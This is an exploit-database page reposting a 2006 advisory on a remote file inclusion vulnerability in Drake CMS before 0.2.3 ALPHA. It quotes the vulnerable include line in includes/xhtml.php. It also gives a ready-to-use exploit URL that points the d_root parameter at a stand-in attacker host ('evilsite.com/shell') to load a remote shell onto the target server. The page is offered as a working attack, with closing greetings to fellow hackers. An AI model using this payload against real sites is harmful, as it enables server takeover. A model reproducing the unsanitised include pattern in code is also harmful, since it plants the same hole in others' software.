[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability

Author
GregStar
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1112
Category
web applications
Date add
04-11-2006
Platform
unsorted
==================================================================
Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability
==================================================================



**********************************************************************************************************
                                                              
			                Coding 4 Fun (c4f.pl) 
			                                      
**********************************************************************************************************

* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ; 

* Class = Remote File Inclusion ;

* Found by = GregStar (gregstar[at]c4f[dot]pl) ;

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code in "includes/xhtml.php" :

 	include $d_root.'classes/kses.php';

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

	http://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends.

**************************************************************************************************************



#  0day.today [2024-11-16]  #